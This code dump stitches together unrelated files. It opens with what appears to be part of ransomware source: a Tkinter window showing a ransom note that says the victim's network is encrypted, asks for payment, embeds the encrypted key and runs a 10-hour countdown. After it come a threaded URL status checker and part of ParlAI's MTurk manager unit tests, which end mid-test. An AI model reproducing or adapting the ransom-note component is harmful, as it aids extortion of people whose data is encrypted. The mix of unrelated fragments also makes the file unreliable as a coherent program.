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'''
photo = PhotoImage(data=photo_code)
photo = photo.subsample(4)
label = Label(self, image=photo, background='black')
label.image = photo # keep a reference!
label.grid(row=5, column=0, rowspan=2)
label = Label(self, image=photo, background='black')
label.image = photo # keep a reference!
label.grid(row=5, column=3, rowspan=2)
message = f'''[COMPANY_NAME]
YOUR NETWORK IS ENCRYPTED NOW
USE - TO GET THE PRICE FOR YOUR DATA
DO NOT GIVE THIS EMAIL TO 3RD PARTIES
DO NOT RENAME OR MOVE THE FILE
THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY
[begin_key]
%s
[end_key]
KEEP IT
'''%(self.encrypted_key_b64)
Label(self, text=message, wraplength=550, font='Helvetica 14 bold', foreground='white',
background='red').grid(row=0, column=0, columnspan=4)
Label(self, text='', font='Helvetica 18 bold', foreground='red',
background='black').grid(row=5, column=2)
Label(self, text='', font='Helvetica 18 bold', foreground='red',
background='black').grid(row=6, column=2)
def start_thread():
# Start timer as thread
thread = threading.Thread(target=start_timer)
thread.daemon = True
thread.start()
def start_timer():
Label(self, text='TIME LEFT:', font='Helvetica 18 bold', foreground='red',
background='black').grid(row=5, column=0, columnspan=4)
try:
s = 36000 # 10 hours
while s:
min, sec = divmod(s, 60)
time_left = '{:02d}:{:02d}'.format(min, sec)
Label(self, text=time_left, font='Helvetica 18 bold', foreground='red',
background='black').grid(row=6, column=0, columnspan=4)
time.sleep(1)
s -= 1
except KeyboardInterrupt:
print('Closed...')
if os == 'Windows':
pass
else:
start_thread()
|
multithread.py
|
#!/usr/bin/python3
from threading import Thread
import sys
import queue
import requests
concurrent = 8
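# A fixed pool of worker threads pulls URLs from a shared queue, issues an
# HTTP HEAD request for each one, and prints the resulting status; q.join()
# at the bottom blocks until every queued URL has been processed.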
def doWork():
while True:
url = q.get()
status, url = getStatus(url)
doSomethingWithResult(status, url)
q.task_done()
def getStatus(ourl):
try:
req = requests.head(ourl, timeout=10, proxies={'http':'','https':''})
status = str(req.status_code)
return status, ourl
    except requests.RequestException:
        return "error", ourl
def doSomethingWithResult(status, url):
print(status, url)
q = queue.Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for url in open('output/OK.lst'):
q.put(url.strip())
q.join()
except KeyboardInterrupt:
sys.exit(1)
|
test_mturk_manager.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import os
import time
import json
import threading
import pickle
from unittest import mock
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.agents import MTurkAgent
from parlai.mturk.core.shared_utils import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.mturk.core.socket_manager import SocketManager, Packet
from parlai.core.params import ParlaiParser
from websocket_server import WebsocketServer
import parlai.mturk.core.mturk_manager as MTurkManagerFile
import parlai.mturk.core.data_model as data_model
import parlai.utils.testing as testing_utils
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.mturk_utils = mock.MagicMock()
# Let's ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_WORKER_ID_3 = 'TEST_WORKER_ID_3'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_HIT_ID_3 = 'TEST_HIT_ID_3'
FAKE_ID = 'BOGUS'
def assert_equal_by(val_func, val, max_time):
    """Poll val_func until it returns val, failing if max_time seconds pass first."""
    start_time = time.time()
    while val_func() != val:
        assert (
            time.time() - start_time < max_time
        ), "Value was not attained in specified time"
        time.sleep(0.1)
class MockSocket:
    """Minimal fake of the websocket server that SocketManager connects to in tests."""
    def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.should_heartbeat = True
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['content']['type'] == 'heartbeat':
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(
client,
json.dumps(
{'type': data_model.SOCKET_ROUTE_PACKET_STRING, 'content': pong}
),
)
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
use_func = self.handlers.get(receiver_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
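        # Bind the fake server to the first free port at or above 3030; the
        # tests point MTurkManager at self.port once the server is up.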
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket, name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class InitTestMTurkManager(unittest.TestCase):
"""
Unit tests for MTurkManager setup.
"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_init(self):
manager = self.mturk_manager
opt = self.opt
self.assertIsNone(manager.server_url)
self.assertIsNone(manager.topic_arn)
self.assertIsNone(manager.server_task_name)
self.assertIsNone(manager.task_group_id)
self.assertIsNone(manager.run_id)
self.assertIsNone(manager.task_files_to_copy)
self.assertIsNone(manager.onboard_function)
self.assertIsNone(manager.socket_manager)
self.assertFalse(manager.is_shutdown)
self.assertFalse(manager.is_unique)
self.assertEqual(manager.opt, opt)
self.assertEqual(manager.mturk_agent_ids, self.mturk_agent_ids)
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertEqual(manager.num_conversations, opt['num_conversations'])
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertGreaterEqual(
manager.required_hits, manager.num_conversations * len(self.mturk_agent_ids)
)
self.assertIsNotNone(manager.agent_pool_change_condition)
self.assertEqual(manager.minimum_messages, opt.get('min_messages', 0))
self.assertEqual(
manager.auto_approve_delay, opt.get('auto_approve_delay', 5 * 24 * 3600)
)
self.assertEqual(manager.has_time_limit, opt.get('max_time', 0) > 0)
self.assertIsInstance(manager.worker_manager, WorkerManager)
self.assertEqual(manager.task_state, manager.STATE_CREATED)
def test_init_state(self):
manager = self.mturk_manager
manager._init_state()
self.assertEqual(manager.agent_pool, [])
self.assertEqual(manager.hit_id_list, [])
self.assertEqual(manager.conversation_index, 0)
self.assertEqual(manager.started_conversations, 0)
self.assertEqual(manager.completed_conversations, 0)
self.assertEqual(manager.task_threads, [])
        self.assertTrue(manager.accepting_workers)
self.assertIsNone(manager.qualifications)
self.assertGreater(manager.time_limit_checked, time.time() - 1)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
class TestMTurkManagerUnitFunctions(unittest.TestCase):
"""
Tests some of the simpler MTurkManager functions that don't require much additional
state to run.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_move_to_waiting(self):
manager = self.mturk_manager
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager.socket_manager = mock.MagicMock()
manager.socket_manager.close_channel = mock.MagicMock()
manager.force_expire_hit = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.agent_1.reduce_state = mock.MagicMock()
self.agent_2.reduce_state = mock.MagicMock()
self.agent_3.reduce_state = mock.MagicMock()
# Test with a disconnected agent, assert the channel is closed
manager._move_agents_to_waiting([self.agent_1])
self.agent_1.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.socket_manager.close_channel.reset_mock()
# Test with a connected agent, should be moved to waiting
manager._move_agents_to_waiting([self.agent_2])
self.agent_2.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_called_once()
args = manager.worker_manager.change_agent_conversation.call_args[1]
self.assertEqual(args['agent'], self.agent_2)
self.assertTrue(manager.is_waiting_world(args['conversation_id']))
self.assertEqual(args['new_agent_id'], 'waiting')
manager.force_expire_hit.assert_not_called()
manager.worker_manager.change_agent_conversation.reset_mock()
# Test when no longer accepting agents
manager.accepting_workers = False
manager._move_agents_to_waiting([self.agent_3])
self.agent_3.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_called_once_with(
self.agent_3.worker_id, self.agent_3.assignment_id
)
def test_socket_setup(self):
"""
Basic socket setup should fail when not in correct state, but succeed otherwise.
"""
self.mturk_manager.task_state = self.mturk_manager.STATE_CREATED
with self.assertRaises(AssertionError):
self.mturk_manager._setup_socket()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_INIT_RUN
self.mturk_manager._setup_socket()
self.assertIsInstance(self.mturk_manager.socket_manager, SocketManager)
def test_worker_alive(self):
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._onboard_new_agent = mock.MagicMock()
manager.socket_manager.open_channel = mock.MagicMock(
wraps=manager.socket_manager.open_channel
)
manager.worker_manager.worker_alive = mock.MagicMock(
wraps=manager.worker_manager.worker_alive
)
open_channel = manager.socket_manager.open_channel
worker_alive = manager.worker_manager.worker_alive
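        # Note: only the content dict of the packets below is exercised by
        # _on_alive; the remaining positional Packet fields are left blank.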
# Test no assignment
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': None,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
open_channel.assert_not_called()
worker_alive.assert_not_called()
manager._onboard_new_agent.assert_not_called()
# Test not accepting workers
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager.accepting_workers = False
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
worker_state = manager.worker_manager._get_worker(TEST_WORKER_ID_1)
self.assertIsNotNone(worker_state)
open_channel.reset_mock()
worker_alive.reset_mock()
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test successful creation
manager.accepting_workers = True
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
manager._onboard_new_agent.assert_called_once()
manager._onboard_new_agent.reset_mock()
manager.force_expire_hit.assert_not_called()
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
# Reconnect in various conditions
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._add_agent_to_pool = mock.MagicMock()
# Reconnect when none state no connection_id
agent.log_reconnect = mock.MagicMock(wraps=agent.log_reconnect)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state onboarding conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'o_1234',
},
'',
)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_ONBOARDING)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state waiting conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with waiting conversation id
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with no conversation id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding but not accepting new workers
manager.accepting_workers = False
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting no conv id
manager.accepting_workers = True
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with conv id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with task id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 't_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_called_with(AssignState.STATUS_IN_TASK)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test active convos failure
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
manager.opt['allowed_conversations'] = 1
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test uniqueness failed
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
manager.is_unique = True
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test in task reconnects
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test all final states
for use_state in [
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_DONE,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
AssignState.STATUS_PARTNER_DISCONNECT,
]:
manager.send_command = mock.MagicMock()
agent.set_status(use_state)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.send_command.assert_called_once()
def test_mturk_messages(self):
"""
Ensure incoming messages work as expected.
"""
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._on_socket_dead = mock.MagicMock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
agent.set_hit_is_abandoned = mock.MagicMock()
# Test SNS_ASSIGN_ABANDONDED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_ABANDONDED},
'',
)
manager._handle_mturk_message(message_packet)
agent.set_hit_is_abandoned.assert_called_once()
agent.set_hit_is_abandoned.reset_mock()
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._on_socket_dead.reset_mock()
# Test SNS_ASSIGN_RETURNED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_RETURNED},
'',
)
agent.hit_is_returned = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
